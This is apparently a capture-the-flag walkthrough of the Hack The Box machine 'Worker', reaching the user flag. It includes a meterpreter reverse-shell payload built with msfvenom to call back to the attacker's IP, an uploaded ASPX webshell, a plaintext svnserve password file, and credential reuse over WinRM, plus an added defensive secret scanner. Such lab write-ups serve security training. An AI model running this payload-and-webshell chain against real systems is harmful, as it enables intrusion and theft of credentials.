User flag only.
Scanning
IP=10.10.10.203
nmap -T4 -sT -p 1-65535 $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-07 20:22 EDT
Nmap scan report for devops.worker.htb (10.10.10.203)
Host is up (0.093s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
3690/tcp open svn
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 137.57 seconds
- We find an HTTP service on port 80: http://10.10.10.203/. gobuster finds nothing on it without credentials
- We find SVN on port 3690
- We find WinRM on port 5985
Solution for user robisl
SVN on port 3690: svn://10.10.10.203/
Connecting to the port returns the svnserve greeting, which confirms the service:
( success ( 2 2 ( ) ( edit-pipeline svndiff1 accepts-svndiff2 absent-entries commit-revprops depth log-revprops atomic-revprops partial-replay inherited-props ephemeral-txnprops file-revs-reverse list ) ) )
----------
mkdir tempsvn
cd tempsvn
svn co svn://10.10.10.203
cat moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb
// The Worker team :)
# Display all commits
svn log
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line
Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line
Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line
-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line
Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line
First version
------------------------------------------------------------------------
Add the hostnames to /etc/hosts (nano /etc/hosts):
10.10.10.203 devops.worker.htb
10.10.10.203 dimension.worker.htb
Go back to revision 2, where the deployment script was added (the file is gone from HEAD but still in history):
svn up -r2
cat deploy.ps1
$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
PASSWORD FOUND: User nathen, Password: wendel98
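Added example (not part of the original writeup): a small Python secret scanner that checks every revision of a repository snapshot rather than only the current one, since deploy.ps1 was removed in later revisions here but stayed recoverable from history. The credential-variable pattern and the sample history are constructed assumptions for illustration.

```python
import re
from typing import Dict, List, Tuple

# Credential-looking variables assigned a quoted string literal, e.g. the
# PowerShell form $plain = "..." seen in deploy.ps1. Assumed pattern, not
# a complete secret-scanning rule set.
CRED_ASSIGN = re.compile(
    r'^\s*\$?(?P<name>\w*(?:pass|pwd|plain|secret|token|cred)\w*)'
    r'\s*=\s*["\'](?P<value>[^"\']{4,})["\']',
    re.IGNORECASE,
)

Finding = Tuple[int, str, int, str, str]  # revision, path, line, variable, masked value

def mask(value: str) -> str:
    """Keep the first two characters only, so the report does not re-leak the secret."""
    return value[:2] + "*" * (len(value) - 2)

def find_hardcoded_credentials(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, variable, masked_value) for each suspicious assignment."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = CRED_ASSIGN.match(line)
        if m:
            hits.append((line_no, m.group("name"), mask(m.group("value"))))
    return hits

def scan_history(history: Dict[int, Dict[str, str]]) -> List[Finding]:
    """history maps revision -> {path: content}; every revision is scanned, not just HEAD."""
    findings: List[Finding] = []
    for rev in sorted(history):
        for path, content in sorted(history[rev].items()):
            for line_no, name, value in find_hardcoded_credentials(content):
                findings.append((rev, path, line_no, name, value))
    return findings

# Constructed sample history shaped like this box's SVN log: the deploy
# script exists only in r2 and is gone again by r3.
SAMPLE_HISTORY = {
    1: {"README.txt": "First version\n"},
    2: {"README.txt": "First version\n",
        "deploy.ps1": '$user = "deploybot"\n$plain = "ExamplePass123"\n'
                      '$pwd = ($plain | ConvertTo-SecureString -AsPlainText -Force)\n'},
    3: {"README.txt": "First version\nMoved to the devops server.\n"},
}

if __name__ == "__main__":
    for rev, path, line_no, name, value in scan_history(SAMPLE_HISTORY):
        print(f"r{rev} {path}:{line_no} ${name} = {value}")
```

Running it reports the r2 finding even though a checkout of r3 contains no deploy.ps1, which is exactly why a repository audit (or a pre-commit secret scan) has to cover history, not just the working copy.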
Use the previous credentials to connect to http://devops.worker.htb
URL="http://devops.worker.htb"
WL=/usr/share/dirb/wordlists/common.txt
gobuster dir -k -u $URL -w $WL -s '200,204,301,302,307,403,500' -e -U "nathen" -P "wendel98"
Generate reverse shell
KALI_IP=10.10.14.30
LISTENER_PORT=4444
# Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe > /root/htb/windows_shell.exe
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.30
set LPORT 4444
set ExitOnSession false
exploit -j -z
- In the web app, click on SmartHotel360
- On the left, click on Repos, then Files
- Click on master, + New Branch
- Give a name to the branch
- Upload 2 files: windows_shell.exe + cmdasp.aspx
- Click Approve, Complete, Merge
- Go to http://alpha.worker.htb/cmdasp.aspx
Use a webshell
cp /usr/share/webshells/aspx/cmdasp.aspx /root/htb/cmdasp.aspx
whoami
iis apppool\defaultapppool
pwd
/c/windows/system32/inetsrv
w:/sites/spectral.worker.htb/windows_shell.exe
Got a meterpreter session
cd c:\Users
ls
ls -la
total 21
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Jul 7 17:53 .
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Oct 8 03:28 ..
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Mar 28 2020 .NET v4.5
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Mar 28 2020 .NET v4.5 Classic
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Aug 18 00:33 Administrator
lrwxrwxrwx 1 Unknown+User Unknown+Group 14 Sep 15 2018 All Users -> /c/ProgramData
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Mar 28 2020 Default
lrwxrwxrwx 1 Unknown+User Unknown+Group 16 Sep 15 2018 Default User -> /c/Users/Default
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Mar 28 2020 Public
-rw-r--r-- 1 Unknown+User Unknown+Group 174 Sep 15 2018 desktop.ini
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Jul 22 01:11 restorer
drwxr-xr-x 1 Unknown+User Unknown+Group 0 Jul 8 19:22 robisl
USER FOUND: robisl
W:\svnrepos\www\conf>ls -la
cat passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
WinRM on port 5985 (from Kali)
cd /usr/bin
gem install evil-winrm
evil-winrm -i 10.10.10.203 -u robisl
Password (entered at the prompt): wolves11
C:\Users\robisl\Documents> cd ..
C:\Users\robisl\Documents> cd Desktop
C:\Users\robisl\Desktop> dir
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/8/2020 3:17 AM 34 user.txt
C:\Users\robisl\Desktop> more user.txt
936fea1a35316c9ecd40a712bbe8d6a6
Solution for Administrator
Not completed